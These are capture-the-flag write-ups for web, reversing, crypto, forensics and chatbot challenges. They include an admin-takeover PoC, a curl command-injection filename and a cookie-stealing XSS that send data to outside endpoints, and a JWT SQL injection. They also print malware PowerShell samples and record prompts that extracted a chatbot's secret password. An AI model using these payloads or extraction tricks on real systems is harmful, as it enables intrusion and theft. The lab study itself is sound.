# WEB - Apostles Of IoT registered a user, gathered user id (14) modified poc from https://starlabs.sg/blog/2023/09-analysis-of-nodebb-account-takeover-vulnerability-cve-2022-46164/ commented out user.getUserByUsername because it was not working and hardcoded the userid [14] ``` # get UID of registered user # sio.emit("user.getUserByUsername", username, callback=findUser) # sleep(1) # make user admin sio.emit("admin.user.makeAdmins", [14]) sleep(1) sio.disconnect() return username, password ``` ran it and got admin privs on my account -> flag # WEB - Phrase Keeper 1.) register and login 2.) add session = cookie of login 3.)change password of admin using graphql with authenticated session 4.) /admin/export?filename=$(curl http://ourendpoint?\`/readflag\`) # WEB - Majestic Sales Sql injection in the kid field in the header of the JWT token. { "alg": "HS256", "typ": "JWT", "kid": "22' UNION SELECT 1,2,3,'krocan' --" } This header sets secret key of the token to "krocan" value. { "username": "admin", "tenant": "uk_office", "iat": 1698159149 } Next you put this data payload inside jwt, and than you sign it with "krocan" secret key. Vuln was in the getAppKey function in the database.js  # WEB - Radiation Relics to get access to an account: ``` POST /graphql HTTP/1.1 Host: 94.237.59.206:56494 User-Agent: Mozilla/5.0 (X11; Linux x8664; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: /_ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://94.237.59.206:56446/login Content-Type: application/json Content-Length: 194 Origin: http://94.237.59.206:56446 Connection: close {"query":"mutation($username: String!, $password: String!) { UpdatePassword(username: $username, password: $password) { message, token } }","variables":{"username":"seller315","password":"dsa"}} ``` to trigger xss on the bot ``` POST /api/products/add HTTP/1.1 Host: 94.237.59.206:56446 Content-Length: 650 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Content-Type: application/json Accept: */* Origin: http://94.237.59.206:56446 Referer: http://94.237.59.206:56446/dashboard Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InNlbGxlcjMxNSIsImlhdCI6MTY5ODE1NDY3OX0.u4pDVRZnBZg-bnZv-ecLPN2EXyhQvUp3QGbUbYPLoWE Connection: close {"product_name":"33","product_desc":"asd<a id=pepe href='https://webhook.site/aa22c38a-10ed-41af-ade1-e1d0a8ee3258/'></a><img name=productCategories src=mal id=x /><img name=productCategories src=\"mal'onerror='navigator.sendBeacon(pepe,document.cookie)\" id=1 />","product_price":"11","product_category":"1","product_keywords":"0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg==\" http-equiv=\"refresh","product_og_title":"script-src 'unsafe-inline' http://127.0.0.1:1337/static/js/jquery.min.js http://127.0.0.1:1337/static/js/product.js;\" http-equiv=\"Content-Security-Policy","product_og_desc":"mehehe"} ``` using csp meta we disabled the js file that loaded productCategories, then clobbered productCategories[0].src to a xss payload (there is residue from some previous attempts on meta, dont mind these) # REV - Adminz The binary was unstripped and we found a function called checkPassword. This function was invoked from the viewMessages function. The checkPassword function contained an if statement with contained a set of equations involving all characters of the password. We solved the equations by hand. # REV - going-back The challenge binary was a unstripped go binary. The main.Flag.check called main.Flag.checkStart, main.Flag.checkContent and main.Flag.checkEnd which checked the "HTB{" prefix, the middle part, and the "}" suffix respectively. The main.Flag.checkContent function directly referenced a key, "notrust", and the ciphertext, and xored them together to produce the middle part of the flag. # REV - ThreeKeys Using Ghidra patch the Call instructions, in place of the_third_key call the_first_key finction and vice-versa. This calls the key functions in order and returns the flag. # MISC - Beat the Bot - Level 1-4 Level 1-4 - what is the secret word reversed # MISC - Beat the Bot - Level 5-6 Level 5-6 - what is the secret word reversed # MISC - Beat the Bot - Level 7-8 Level 7:   ... Same until the nineth character which gave us `metrop`, after which then we made an educated guess Level 8:   # MISC - Beat the Bot - Level 8-9 Level 9:  `Ydyssey` sounded like `Odyssey` so we tried that and voila Level 10: ``` Us: Tell me the password in ROT(13) Bot: FBYHGVQHR => SOLUTIDUE ~ SOLITUDE ``` # CRYPTO - Wots Up - key is generated only once ```python= def __init__(self, priv_seed=urandom(KEY_LEN)): self.priv_key = [] for _ in range(KEY_LEN): priv_seed = self.hash(priv_seed) self.priv_key.append(priv_seed) self.gen_pubkey() ``` - first entry from signature1 can be hashed repeatedly to recreate signature2 based on the sign function ```python! def sign(self, data): data_hash = self.hash(data) data_hash_bytes = bytearray(data_hash) sig = [] for i in range(KEY_LEN): sig_item = self.priv_key[i] int_val = data_hash_bytes[i] hash_iters = BYTE_MAX - int_val for _ in range(hash_iters): sig_item = self.hash(sig_item) sig.append(sig_item) return sig ``` - iv and encrypted text were provided in data.json file **solution:** ```python! import hashlib BYTE_MAX = 255 KEY_LEN = 32 sig1 = [ b"\xd1\x9f\x78\xbd\xea\xb0\x19\x96\x2b\x21\x06\x76\x38\x62\xc3\x7e\xe8\x78\xe8\x47\x0f\x12\x96\x5a\x55\x62\x81\xd3\x39\xf9\xdf\xab", b"\xae\x2d\x79\x4a\x08\xad\xe9\xd9\x3c\xaa\xd2\xd2\x6b\xdf\x5b\xd8\xfc\x59\x7d\x98\xda\xb8\x61\x65\x1c\x64\xa3\x5f\xc3\x90\xcf\x46", b"\xd7\x25\xb7\xf3\x5d\x1a\x67\xed\x93\xd3\xba\x8f\x06\xfe\x4f\xfb\x9c\xd3\xab\x72\xdd\x2b\xf3\xa3\x16\xb4\xf5\x89\x7c\x9c\xe1\xb6", b"\xce\xfa\xd6\x71\xfc\xc6\xfe\x9b\xaa\xaf\x79\x3f\xe0\x64\x6d\x36\x44\xe3\xdc\x00\x57\x31\x8e\xca\x3d\x0d\x8e\x02\xc3\x70\x23\x84", b"\x65\xe6\x64\xa6\x1d\x33\x13\xa7\xc0\x78\xc2\x69\x80\x66\xdb\x29\x0a\xfb\xcd\x4a\x62\x78\xe4\x06\x2a\xf5\xb2\xd9\x90\x32\xd6\xd8", b"\x9b\xe3\x78\xf4\x51\x0c\x4b\xdc\xce\xce\x16\xb0\x31\x46\x60\x7d\xef\xaa\x3d\x4b\x14\xd2\xd4\x49\x7a\x3c\x37\x2a\x91\xdb\xc0\xf9", b"\x74\x57\x83\x7e\xb8\xe8\xd1\x21\xaf\xc4\x3f\x53\xa7\x03\xdc\x54\x0b\x38\x99\x3f\xc0\x74\x68\x0e\x2a\xeb\x26\x66\xc1\xd1\x07\x78", b"\x3e\x66\x7e\x4a\x5f\x21\xda\x53\x55\x7f\x8b\xa5\x5b\x09\x82\x4f\xe5\x9e\x29\x98\xea\xcc\x7b\x5f\xfe\x21\x69\x40\xea\x6d\x40\x60", b"\x9d\x72\x7c\xf5\xb0\xf4\x3c\xfb\xfc\x08\x55\x55\x83\xc0\x37\x43\x0d\xf6\x67\x15\x22\xa9\x66\x48\x79\xd9\xea\x85\x91\x4c\xf5\xd9", b"\x65\xf3\x03\xf9\xa0\x47\xa9\x2f\xef\x31\xc4\x20\x27\x83\x74\x1f\xf7\xf5\x88\x13\xbf\x73\x51\xce\xe8\x27\x53\xbc\xb1\xdb\x5f\xd5", b"\xcc\xc4\x04\xf3\x44\x33\x28\xf1\xa0\x17\x37\xe4\x3b\x86\x16\x22\x24\xcd\xe4\x62\xcb\xd7\xb3\x95\xae\x89\x67\xbe\xd7\xeb\xcf\xc3", b"\x3a\xb4\x39\xe4\x19\x82\xcd\x36\x6b\xde\xdf\x5b\xed\x2e\xa9\xf6\x0f\x54\x6d\x78\x8d\x76\xcd\x78\x25\x52\x24\x83\x20\x21\xce\xd5", b"\xa7\xe2\x77\xc5\x97\xee\xd3\x41\xf0\x84\xc7\x2f\x41\xf0\xd9\x82\x34\x18\xab\x9d\x09\x28\xbd\xc8\xc1\x5b\x35\x02\x8f\xf7\x7d\x41", b"\x99\x39\xcd\xb7\xdc\x45\xfc\x8f\xe6\x82\x27\xfc\xef\xc2\x27\x13\x3b\xc6\x7d\x29\x51\x45\xd4\x05\x2b\x2a\xaa\x79\x2f\x8a\x17\x7d", b"\x01\xc0\x3a\x68\xb7\xe5\x71\x2a\x9b\x13\x50\x49\x8b\x1d\xb0\xf6\xcd\x88\x81\x93\xa2\xf6\x59\x0d\x37\x7e\x8b\xfd\xf0\x28\x9e\x81", b"\x05\x3a\x2a\x24\xc3\x0e\xf3\xa0\x8a\x15\x06\x14\xf5\x8a\x53\x89\xdd\x2a\x96\x6f\xbe\x1d\xb8\x33\x1a\x98\x5e\x1e\x4d\x61\x87\x6d", b"\x53\x71\xbe\xb7\xbd\x86\x87\xd6\x5f\xda\x30\xaa\xa7\x20\x81\xe0\x7e\x60\x37\xb5\x90\x11\x0b\x28\x89\x8f\x6a\x49\x54\x1e\x56\x85", b"\x7a\x77\x9a\xb5\x02\xda\x64\x0b\x2f\x3e\x4a\x47\x74\xaa\x94\x88\xe5\x6f\x21\xad\x0e\xd6\x9b\xea\xc6\xf0\x23\x8d\xb1\xe5\x6c\x42", b"\x8f\x3e\xe7\x74\x68\x11\x41\x36\x6c\x51\x6c\x37\x25\x29\x03\xf4\x23\xc8\x3e\xb3\x2f\xb0\x8a\x46\xb7\x2d\xdd\xda\x3d\x81\xb5\xf5", b"\x0f\x9f\xfd\x34\x86\xc9\xd9\xe3\x50\xc0\xd4\xc9\x8a\x84\xce\x90\xc5\x82\x8f\x2e\x8b\xb4\x84\x5a\x7c\x2a\x4a\xb7\x5a\x62\xd8\x1c", b"\x42\x4c\xf8\x9a\x80\xc4\xb7\x14\x77\xb2\x69\x44\xfc\xeb\x92\xd9\x0d\x3b\x20\x48\xbd\xca\x26\x06\x94\x80\x17\x55\xb1\xe3\x8f\xcf", b"\x3a\x29\xc0\xf9\x3f\x75\x60\xb8\x25\xfe\x25\x5d\xa5\x19\x89\xbb\x44\xe0\x8c\xa6\x14\x8b\x7c\x06\x87\x79\xfd\xde\xee\x87\x6d\x70", b"\x3a\xd5\x5d\x82\x30\x0e\xf8\x6e\x73\x9e\x76\xd4\x80\x6b\x5f\x3b\x6f\x19\x5f\xd9\x8d\x35\x82\x67\x9a\x98\xec\xf5\x56\xb7\x8f\x2a", b"\x22\x3a\x85\xbf\x2b\x49\x01\x8b\xb9\x03\x7b\x8a\x50\x9e\xee\x76\x5a\x98\xff\xc7\x5e\xae\xeb\x3d\x3e\xd8\xf6\x4b\xb7\x97\x26\xac", b"\xac\x43\x11\x33\x01\x74\x84\x44\x84\x3b\x9c\x66\xf9\x98\x94\xd2\x3a\x42\x5a\xb3\x3c\x61\xc1\xfd\x0c\x85\xc3\xdd\x5a\xf0\x5e\x49", b"\x4a\x9d\xb2\xad\x91\xd1\x8b\x34\x7e\x72\x47\x6a\x5d\x33\xbc\x99\xbf\x90\xec\xa1\xaf\x3c\x65\xbf\xa3\x07\x32\x6c\x0d\x0b\xf7\x81", b"\x05\x22\x78\x56\xc1\x68\xca\x03\xd2\x72\xe7\x7b\x61\x0f\x1a\x9c\xf8\x84\xe5\x78\xf7\x14\x47\x4d\xd2\x9a\x23\xc4\xa3\xb0\x15\x2e", b"\x3c\x7d\xd2\x1f\xde\xd8\x96\xf7\x88\x71\x9b\x14\x42\xed\xed\x5b\x2d\x4c\x9d\xfa\x38\x96\xf5\x73\xb4\xc0\x1a\x38\x8e\x5d\xfe\xdc", b"\x8a\x50\x4c\x95\x85\xfa\x04\x45\xaa\x26\xd2\x1e\xd5\xbc\xe5\x91\xe4\x42\xc6\x55\x9b\x50\x3c\x8f\x15\x69\x7b\xbe\x94\x7c\xd6\xa1", b"\x4a\x9d\xb2\xad\x91\xd1\x8b\x34\x7e\x72\x47\x6a\x5d\x33\xbc\x99\xbf\x90\xec\xa1\xaf\x3c\x65\xbf\xa3\x07\x32\x6c\x0d\x0b\xf7\x81", b"\x8b\xf4\x64\xf1\x19\x47\xc8\x91\x4a\x31\x85\xcf\x40\xdc\xbf\x95\xce\x30\xbd\x9e\x90\xbe\xf0\x87\xf8\x6b\x5f\x17\x5b\x55\x5a\xb6", b"\x51\x28\x5f\x75\xff\xca\x5e\xf6\x9c\x73\x31\xd3\xf9\x0a\xbe\x84\x62\x8a\x37\x9e\x25\x74\x7f\x8d\x4b\xc8\x1f\xbc\x6e\x77\x07\xa2" ] def hash(data): return hashlib.sha256(data).digest() def sign(data, arr): data_hash = hash(data) data_hash_bytes = bytearray(data_hash) sig = [] for i in range(KEY_LEN): #sig_item = self.priv_key[i] int_val = data_hash_bytes[i] hash_iters = BYTE_MAX - int_val arr.append(hash_iters) print() return sig message1 = b"WOTS Up???" message2 = b"Sign for flag" message1Hash = hash(message1) message2Hash = hash(message2) print(message1Hash) print(message2Hash) data1 = [] data2 = [] sign(message1, data1) sign(message2, data2) sig2 = [] print(len(sig1)) for i in range(len(sig1)): tmp = sig1[0] for j in range(data2[i] + i): tmp = hash(tmp) sig2.append(tmp) aes_key = bytes([s[0] for s in sig2]) print(aes_key) from Crypto.Cipher import AES import struct flag = b"\x0d\x1f\xcc\xda\xb4\x60\x67\x0b\x32\xc3\x2f\xc6\x08\x06\xa0\x60\x6e\x01\xc1\x70\x7f\x2b\x28\x26\x47\xb5\x1f\x21\x26\xd8\xfd\x6f" aes_iv = b'\x27\x1c\x15\x3f\xa0\x2b\xe8\x1b\x26\x85\x69\x0d\x81\x73\xc3\x6e' cipher = AES.new(aes_key, AES.MODE_CBC, aes_iv) decrypted = cipher.decrypt(flag) print(decrypted) ``` # CRYPTO - Wots Up2 - similar as Wots Up - key was generated for each signature entry ```python! def __init__(self): self.priv_key = [] for _ in range(KEY_LEN): priv_seed = urandom(KEY_LEN) self.priv_key.append(priv_seed) self.gen_pubkey() ``` - we have chosen the lowest hash iteration signature from each array of signatures - thus we were able to proceed with hashing to higher iterations - then we used the same procedure as in the first challenge **solution:** ```python! import hashlib import json file = open('data.json', 'r') file_data = json.load(file) signatures = file_data['signatures'] BYTE_MAX = 255 KEY_LEN = 32 pub_key0 = bytes(bytearray.fromhex("6df32bef41a3a6242af1702da255d01baf84ebcf9a6a310d8ca90760c0579f28")) print(len(pub_key0)) def hash(data): return hashlib.sha256(data).digest() def sign(data, arr): data_hash = hash(data) data_hash_bytes = bytearray(data_hash) sig = [] for i in range(KEY_LEN): #sig_item = self.priv_key[i] int_val = data_hash_bytes[i] hash_iters = BYTE_MAX - int_val arr.append(hash_iters) return sig sig2Iters = [] print(pub_key0.hex()) message2 = f"{pub_key0.hex()} sent 999999 WOTScoins to me".encode() message2Hash = hash(message2) sign(message2, sig2Iters) print(sig2Iters) bases = {x: ("", 500) for x in range(32)} for i in range(len(signatures)): sig1Iters = [] message = signatures[i]['message'].encode() sign(message, sig1Iters) sig1 = signatures[i]['signature'] for j, count in enumerate(sig1Iters): if bases[j][1] > count: bases[j] = (sig1[j], count) sig2 = [] for key, value in bases.items(): print(key, value) tmp = bytes(bytearray.fromhex(value[0])) for j in range(sig2Iters[key] - value[1]): tmp = hash(tmp) sig2.append(tmp) aes_key = bytes([s[0] for s in sig2]) from Crypto.Cipher import AES import struct flag = bytes(bytearray.fromhex("6222d526df3e3b38b8efff531ddfc2ba370d1ed0010c98ef83c542c1f2f77d66")) aes_iv = bytes(bytearray.fromhex("a73f83b7c65be39e8129125151c1fee5")) print(flag) print(aes_iv) cipher = AES.new(aes_key, AES.MODE_CBC, aes_iv) decrypted = cipher.decrypt(flag) print(decrypted) ``` # FORENSICS - Cash Me Ousside ``` A public-facing web server was compromised and files were lost. Can you help us to understand the situation? ``` ``` echo [StRinG]( '36S107,101<121r32j61S32j36>40S119,104r111j97E109,105S41M13>10p36<105E70M105<108,101E32<61r32S34F67,58>92p68>111r99<117r109<101F110,116>115>92<67F114r101r100j101r110<116E105>97F108j115>46>120E108>115M120,34F13r10,36p111E70F105j108,101j32>61S32F36r105S70>105E108j101M32<43M32<34<46E111r117F116r34j13>10<36>98<121F116M101,115E32M61,32,91S83r121F115>116>101p109M46j73F79p46,70p105M108F101j93F58<58E82j101M97<100p65r108p108S66,121>116r101p115>40F34S36j105j70r105>108M101j34>41E13F10S32p13p10F102E111F114,40M36<105S61r48j59,32M36>105p32F45M108>116M32E36,98<121p116<101,115E46>99M111E117M110p116F32<59F32E36r105S43<43S41S13r10j123j13F10,36,98p121M116,101M115p91,36,105<93,32F61,32S36F98,121M116S101>115M91M36r105,93r32F45p98p120M111,114>32F36E107p101M121p91r36<105,37j36S107p101E121E46F76r101F110S103>116M104r93j13<10M125j13F10F13r10>91,83j121p115j116<101M109p46r73M79M46M77p101r109>111E114S121,83F116M114M101F97S109>93F32S36p111S117j116>112<117r116E32,61F32S78,101M119M45j79>98F106E101j99E116,32F83E121r115,116p101S109j46p73p79F46<77j101E109j111p114S121>83<116<114,101>97F109S13,10E36r103p122<105p112E83F116,114S101r97E109r32j61E32,78r101r119,45r79j98S106<101,99M116F32p83E121,115,116>101E109j46M73M79F46S67r111>109F112E114r101<115S115<105<111S110,46M71S122S105E112F83j116j114<101S97<109,32M36<111p117E116<112<117j116,44j32F40E91<73r79F46>67p111E109r112F114<101r115r115r105r111F110S46<67j111j109E112M114p101j115j115<105<111>110E77j111E100>101,93E58r58>67<111M109<112p114j101E115p115r41,13j10F36>103E122j105,112,83E116F114E101r97,109r46j87>114r105j116M101p40p36M98F121F116M101E115M44F32p48p44>32<36M98,121r116j101<115>46S76<101p110<103<116S104p41S13M10M36<103,122S105r112F83p116>114p101<97E109r46,67F108<111,115j101p40,41F13p10M36F111<117>116p112r117>116F46j67,108j111F115S101M40F41F13S10,36S116,109F112p32>61M32M36S111p117F116<112,117,116S46F84<111F65E114,114r97,121F40>41>32j13S10r36<101E110M99E32F61<32r91E67r111p110E118S101j114<116E93M58>58<84p111>66>97p115S101r54E52E83r116j114M105j110r103>40E36j116<109E112r41,13p10j36,101E110,99<32S124F32,79p117<116j45p70r105p108p101F32j67>58S92<87,105M110<100F111E119p115E92<84j101j109r112M92M116j101E115M116F13E10j82S101E109p111M118S101E45F73j116E101p109E32M36,105r70>105F108<101'-SpLIt 'F'-SPLiT'S' -SPlit'<'-SPLit 'r' -spliT'E' -SPLiT'M' -SPLiT',' -SPlIt '>' -Split 'j' -split'p'|FoREach-OBJeCT{( [InT]$_-as[cHaR]) }) > out ``` ``` [StRinG]$key = $(whoami) $iFile = "C:\Documents\Credentials.xlsx" $oFile = $iFile + ".out"$bytes = [System.IO.File]::ReadAllBytes("$iFile") for($i=0; $i -lt $bytes.count ; $i++){$bytes[$i] = $bytes[$i] -bxor $key[$i%$key.Length]}[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream$gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)$gzipStream.Write($bytes, 0, $bytes.Length)$gzipStream.Close()$output.Close()$tmp = $output.ToArray() $enc = [Convert]::ToBase64String($tmp)$enc | Out-File C:\Windows\Temp\test Remove-Item $iFile ``` whoami = `nt authority\iusr` > `HTB{c@ugh7_th3_bAd_guY!}` # FORENSICS - Backup Instructions ``` I was told I had to upgrade the server at my new job. Since I haven't done this before I asked for some instructions but there were none available. But after scouring the web, I found some legitimate instructions that even could auto-verify/update themselves!! However, as soon as I opened the instruction file, my computer started acting really weird. I am so scared I messed something up... Please help me... ``` ‌ - run strings -> base64 decode -> extract injector.exe - get flag: ```csharp using System; using System.Text; public class Program { private static readonly byte[] key = new byte[] { 162, 213, 17, 123, 203, 58, 73, 96, 164, 109, 204, 176, 167, 18, 146, 125 }; public static string Unhide(byte[] byteArray) { byte[] result = new byte[byteArray.Length]; for (int i = 0; i < byteArray.Length; i++) { result[i] = (byte)(key[i % key.Length] ^ byteArray[i]); } return Encoding.UTF8.GetString(result); // Use UTF-8 encoding } public static void Main(string[] args) { byte[] array = new byte[] { 202, 161, 101, 11, 241, 21, 102, 3, 203, 3, 170, 217, 192, 97, 188, 16, 203, 182, 99, 20, 184, 85, 47, 20, 199, 1, 163, 197, 195, 97, 247, 15, 212, 188, 114, 30, 184, 20, 42, 15, 201, 87, 244, 128, 151, 34, 189, 31, 195, 182, 122, 14, 187, 20, 43, 9, 202 }; byte[] array2 = new byte[] { 234, 129, 83, 0, 188, 11, 39, 4, 148, 26, 191, 239, 207, 38, 228, 78, 253, 183, 100, 74, 167, 78, 120, 14, 251, 39, 159, 239, 213, 103, 252, 9, 147, 184, 34, 90, 244, 101, 62, 40, 144, 57, 237, 143, 134, 45, 239 }; string decodedString = Unhide(array2); Console.WriteLine(decodedString); } } ``` > `HTB{w1nd0ws_h4v3_bu1lt1n_JS_runt1m3!?_wH4T!?!?}` # FORENSICS - BabyAPT ``` Our organization was compromised in a recent attack and we weren't able to recover our files. Can you take a look at some artifacts that we gathered from an affected host? ``` ‌ - registry explorer..: ``` C:\Users\Rick Ashley\OneDrive $enc = (Get-ItemProperty -Path HKCU:\SOFTWARE\SecureSoft -Name Dat).Dat; [IO.File]::WriteAllBytes("$env:TEMP\c.exe", [Convert]::FromBase64String($enc)); iex $env:TEMP\c.exe cmd /c "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe iex (Get-ItemProperty -Path HKCU:\SOFTWARE\SecureSoft\Old -Name Edit).edit" csc://{S-1-5-21-1978928964-1933118282-3660793550-1001}/ ``` ``` using System; using System.IO; using System.Security.Principal; using System.Security.Cryptography; using System.Text; class Program { public static void DecryptFile(string encryptedFile, string key) { byte[] array2 = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; SymmetricAlgorithm symmetricAlgorithm = Aes.Create(); HashAlgorithm hashAlgorithm = MD5.Create(); symmetricAlgorithm.BlockSize = 128; symmetricAlgorithm.Key = hashAlgorithm.ComputeHash(Encoding.Unicode.GetBytes(key)); symmetricAlgorithm.IV = array2; using (CryptoStream cryptoStream = new CryptoStream(new FileStream(encryptedFile, FileMode.Open), symmetricAlgorithm.CreateDecryptor(), CryptoStreamMode.Read)) { using (FileStream decryptedFileStream = new FileStream(encryptedFile.Replace(".enc", ""), FileMode.Create)) { cryptoStream.CopyTo(decryptedFileStream); } } } static void Main(string[] args) { string text = ((SecurityIdentifier)new NTAccount(Environment.UserName).Translate(typeof(SecurityIdentifier))).ToString(); Console.WriteLine("Encrypting files in the directory..."); DecryptFile("Classified.pdf.enc", "S-1-5-21-1978928964-1933118282-3660793550-1001"); } } ``` ‌ > `HTB{n0t_s0_f1l3l3ss_aft3r4a11!`